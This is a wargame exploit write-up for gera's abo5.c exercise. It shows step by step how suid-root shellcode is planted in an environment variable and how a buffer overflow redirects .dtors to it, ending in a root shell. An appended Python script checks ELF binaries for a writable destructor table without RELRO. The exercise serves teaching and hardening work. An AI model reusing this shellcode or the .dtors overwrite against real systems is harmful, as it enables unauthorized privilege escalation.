/
| [exp-abo5.txt] Wed Mar 29 21:34:09 CEST 2006
|
| abo5.c exploit - solution 1
| http://community.core-sdi.com/~gera/InsecureProgramming/abo5.c
|
| Copyright: bunker - http://rawlab.altervista.org
| 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
\

/
| Suid abo5 (testing)
\

bunker@syn:~/abo5$ su
Password:
root@syn:/home/bunker/abo5# chown root.root abo5
root@syn:/home/bunker/abo5# chmod +s abo5
root@syn:/home/bunker/abo5# exit
exit

/
| Put shellcode in file "s_code"
\

bunker@syn:~/abo5$ perl -e 'print "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"' > s_code

/
| Export SCODE env with NOPx100 + scode
\

bunker@syn:~/abo5$ export SCODE=`perl -e 'print "\x90"x100'``cat s_code`

/
| Find $SCODE address (see exp-abo3.txt for getenvaddr.c)
\

bunker@syn:~/abo1$ ./getenvaddr SCODE
SCODE is located at 0xbffff441

/
| Get address of .dtors section
\

bunker@syn:~/abo5$ objdump -s -j .dtors abo5

Contents of section .dtors:
 80495e0 ffffffff 00000000                    ........

bunker@syn:~/abo5$ nm -a abo5 | grep DTOR
080495e4 d __DTOR_END__
080495e0 d __DTOR_LIST__

/
| Execute abo5, using the buffer overflow to overwrite the value of pbuf
| with the address of the .dtors section, then write the address of the
| shellcode into .dtors through pbuf.
\

bunker@syn:~/abo5$ ./abo5 `perl -e 'print "\xe4\x95\x04\x08"x68'` `perl -e 'print "\x51\xf4\xff\xbf"'`
sh-3.1# id
uid=0(root) gid=100(users) groups=17(audio),18(video),19(cdrom),100(users)

/
| Boom! :D
\
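The write into .dtors only works because that section is writable at run time and its entries are called at exit; modern toolchains put the same table in .fini_array, and RELRO (PT_GNU_RELRO) remaps it read-only after relocation. As an added check that is not part of the original writeup, the Python below parses an ELF's program and section headers and reports whether the destructor table is writable and whether it lies inside a RELRO range; the ELF image it inspects is constructed inline (not abo5), with a .dtors section placed at the same 0x80495e0 address seen above.

```python
import struct

PT_GNU_RELRO = 0x6474E552                 # program header type marking the RELRO region
SHF_WRITE = 0x1                           # section flag: writable at run time
TARGETS = (b".dtors", b".fini_array")     # destructor tables, old and new toolchains

def destructor_table_status(elf: bytes) -> dict:
    """Map each destructor table in a little-endian ELF32/ELF64 image to
    {'writable': section is writable, 'relro': section lies inside PT_GNU_RELRO}."""
    if elf[:4] != b"\x7fELF" or elf[5] != 1:
        raise ValueError("not a little-endian ELF image")
    is64 = elf[4] == 2
    ehdr_fmt = "<HHIQQQIHHHHHH" if is64 else "<HHIIIIIHHHHHH"
    phdr_fmt = "<IIQQQQQQ" if is64 else "<IIIIIIII"
    shdr_fmt = "<IIQQQQIIQQ" if is64 else "<IIIIIIIIII"
    (_, _, _, _, phoff, shoff, _, _, phentsize, phnum, shentsize, shnum,
     shstrndx) = struct.unpack_from(ehdr_fmt, elf, 16)
    relro = []                            # [vaddr, vaddr + memsz) ranges made read-only after relocation
    for i in range(phnum):
        ph = struct.unpack_from(phdr_fmt, elf, phoff + i * phentsize)
        if ph[0] == PT_GNU_RELRO:
            vaddr, memsz = (ph[3], ph[6]) if is64 else (ph[2], ph[5])
            relro.append((vaddr, vaddr + memsz))
    shdrs = [struct.unpack_from(shdr_fmt, elf, shoff + i * shentsize) for i in range(shnum)]
    strtab = shdrs[shstrndx][4]           # file offset of .shstrtab
    status = {}
    for sh in shdrs:
        name = elf[strtab + sh[0]:elf.index(b"\0", strtab + sh[0])]
        if name in TARGETS:
            flags, addr = sh[2], sh[3]
            status[name.decode()] = {"writable": bool(flags & SHF_WRITE),
                                     "relro": any(lo <= addr < hi for lo, hi in relro)}
    return status

def build_sample_elf32(relro: bool) -> bytes:
    """Constructed ELF32 image (not abo5): one writable .dtors section at
    0x80495e0 and one segment that is either PT_GNU_RELRO over it or a plain PT_LOAD."""
    shstr = b"\0.dtors\0.shstrtab\0"
    phoff, shstr_off = 52, 52 + 32
    shoff = shstr_off + len(shstr)
    ehdr = b"\x7fELF\x01\x01\x01" + b"\0" * 9 + struct.pack(
        "<HHIIIIIHHHHHH", 2, 3, 1, 0, phoff, shoff, 0, 52, 32, 1, 40, 3, 2)
    phdr = struct.pack("<IIIIIIII", PT_GNU_RELRO if relro else 1,
                       0, 0x80495E0, 0x80495E0, 8, 8, 4, 1)
    shdrs = struct.pack("<10I", *([0] * 10))                                        # SHN_UNDEF entry
    shdrs += struct.pack("<10I", 1, 1, SHF_WRITE | 2, 0x80495E0, 0, 8, 0, 0, 4, 0)  # .dtors
    shdrs += struct.pack("<10I", 8, 3, 0, 0, shstr_off, len(shstr), 0, 0, 1, 0)     # .shstrtab
    return ehdr + phdr + shstr + shdrs

if __name__ == "__main__":
    for relro in (False, True):
        print("RELRO" if relro else "no RELRO", destructor_table_status(build_sample_elf32(relro)))
```

Run it against a real binary with `destructor_table_status(open(path, "rb").read())`; a writable .dtors or .fini_array outside any RELRO range is exactly the condition this writeup relies on.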